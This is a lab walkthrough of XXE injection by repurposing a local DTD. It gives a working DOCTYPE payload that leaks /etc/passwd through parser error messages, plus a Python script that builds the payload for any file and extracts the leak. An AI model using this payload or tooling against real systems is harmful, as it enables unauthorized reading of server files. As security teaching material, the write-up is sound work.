Exploiting XXE to retrieve data by repurposing a local DTD

Hello my friend,

I wanted to share how I solved this lab, for the sake of spreading knowledge.

First, let’s talk a little about what XML is.

XML, like HTML and SGML, is a widely used markup language designed for transferring and storing data and documents between different applications. Unlike HTML, which focuses on displaying data, XML prioritizes storing data and representing its structure. An XML document is a tree of elements, each identified by a tag. The first element is called the root element, and the elements nested inside it are called child elements.

Example of an XML document representing a user structure:

<?xml version="1.0"?>
<users>
    <user>
        <!-- child elements here -->
        <username>admin</username>
        <password>secrte</password>
        <group>Administrator</group>
    </user>
    <user>
        <username>h3ckt00r</username>
        <password>secrtehacktor</password>
        <group>users</group>
    </user>
</users>

The example above shows the key parts of an XML document: the XML declaration on the first line, the root element (users), the child elements nested inside it, and a comment.

Now that we understand the basics, let's go into the solution.

Open the lab website and browse a product page. You will find a "Check stock" feature. Click it, intercept the request, and send it to Burp Suite's Repeater; the request body is XML, which is what we will tamper with.

The idea is to reuse a DTD that already exists on the server's filesystem. First I load the local DTD /usr/share/yelp/dtd/docbookx.dtd (it ships with GNOME's yelp help browser) as a parameter entity. That DTD declares a parameter entity named ISOamso and references it. In my internal DTD subset I redefine ISOamso, and because the internal subset is processed before the external DTD and the first declaration of an entity is the binding one, my definition wins. Inside that redefinition I declare an entity file that reads /etc/passwd, then an entity eval that declares a third entity error whose SYSTEM identifier is a nonexistent path with the file contents appended. Referencing %eval; and then %error; makes the parser try to open /nonexistent/<contents of /etc/passwd>, and the resulting "file not found" error message leaks the file. Finally I reference %read; so the external DTD is actually loaded and my redefined ISOamso is expanded inside it.

One XML rule explains the odd encoding in the payload: parameter entity references inside markup declarations are only permitted in an external DTD, not in the internal subset. That is why the nested % and & are written as &#x25; and &#x26; and the inner quotes as &#x27;: they stay literal while the internal subset is read and only become real references once docbookx.dtd references %ISOamso;. Put the DOCTYPE below at the top of the XML body, after the XML declaration and before the root element, and send the request. Let's look at the error; it will make you understand, my friend.

<!DOCTYPE h3ckt00r [ 
<!ENTITY % read SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY  &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY  &#x25; eval  "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%read;
]>
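To make the mechanics concrete, here is an added Python example (not code from the original post) that builds the same DOCTYPE for any local DTD path, entity name and target file, wraps it in a stockCheck request body (that body shape is an assumption about the lab), and recovers the leaked file from the parser's error text. The sample error message embedded in it is constructed for the demo; the real lab response may be worded differently.

```python
"""Build the XXE payload that repurposes a local DTD, and recover the leaked
file from the parser's error message.

This is an added example, not code from the original post. The <stockCheck>
request shape is an assumption, and SAMPLE_ERROR below is constructed to
look like a "file not found" error rather than captured from a real target.
"""
import re

LOCAL_DTD = "/usr/share/yelp/dtd/docbookx.dtd"  # DTD assumed present on the target
REDEFINED_ENTITY = "ISOamso"  # parameter entity declared in docbookx.dtd
LEAK_MARKER = "/nonexistent/"  # path prefix the file contents get appended to


def build_doctype(target_file, local_dtd=LOCAL_DTD, entity=REDEFINED_ENTITY):
    """Return the DOCTYPE that redefines `entity` so the external DTD leaks
    `target_file` through an error message."""
    # Inside the entity value, % and & are written as character references
    # (&#x25; and &#x26;) and ' as &#x27;. They are not expanded while the
    # internal subset is read; they become real parameter-entity references
    # only when the external DTD references %ISOamso;, where nested
    # references inside markup declarations are allowed.
    inner = (
        f'<!ENTITY &#x25; file SYSTEM "file://{target_file}">'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        f"&#x27;file://{LEAK_MARKER}&#x25;file;&#x27;>\">"
        "&#x25;eval;"
        "&#x25;error;"
    )
    return (
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % read SYSTEM "file://{local_dtd}">\n'
        f"<!ENTITY % {entity} '{inner}'>\n"
        "%read;\n"
        "]>"
    )


def build_request_body(target_file, product_id="1", store_id="1"):
    """Assumed stockCheck request with the DOCTYPE inserted after the XML
    declaration and before the root element."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f"{build_doctype(target_file)}\n"
        f"<stockCheck><productId>{product_id}</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )


def extract_leak(error_text, marker=LEAK_MARKER):
    """Pull the leaked file contents out of a 'file not found' style error.

    Returns None when the marker is absent (the attack did not fire)."""
    idx = error_text.find(marker)
    if idx < 0:
        return None
    tail = error_text[idx + len(marker):]
    # Stop at whatever the parser appended after the path: a closing quote,
    # or Java's " (No such file or directory)" suffix.
    leaked = re.split(r'["\']|\s\(No such file', tail, maxsplit=1)[0]
    return leaked.rstrip()


# Constructed sample of the error a Java-based parser returns (not real output).
SAMPLE_ERROR = (
    '"XML parser exited with error: java.io.FileNotFoundException: '
    "/nonexistent/root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    ' (No such file or directory)"'
)


if __name__ == "__main__":
    print(build_request_body("/etc/passwd"))  # paste this into Burp Repeater
    print("\nleaked:\n" + extract_leak(SAMPLE_ERROR))
```

Run it to print the request body, paste that into the Check stock request in Burp Repeater, and pass the response's error text to extract_leak. A quick sanity check on the built DOCTYPE is that it contains exactly three raw % characters (the two outer declarations and %read;); any more means a nested reference was left unencoded and the internal subset will fail to parse.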

Thanks for reading. I hope you liked it.
